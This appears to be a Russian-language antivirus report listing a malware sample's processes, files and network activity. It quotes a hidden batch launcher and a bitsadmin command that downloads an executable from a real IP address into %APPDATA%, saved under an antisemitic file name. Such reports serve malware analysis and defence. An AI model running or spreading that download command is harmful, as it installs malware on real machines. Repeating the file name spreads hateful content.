Техническая информация
- '<SYSTEM32>\cmd.exe' /c %APPDATA%\oijhsiajsi92ius.bat
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1868
- %APPDATA%\oijhsiajsi92ius.bat
- nul
- %TEMP%\1228617.cvr
- '18#.#41.25.79':80
- '<SYSTEM32>\cmd.exe' /c %APPDATA%\oijhsiajsi92ius.bat' (со скрытым окном)
- '<SYSTEM32>\bitsadmin.exe' /transfer myjob /download /priority high http://185.141.25.79/software.exe "%APPDATA%\fr33gaza_j3ws_killers.exe"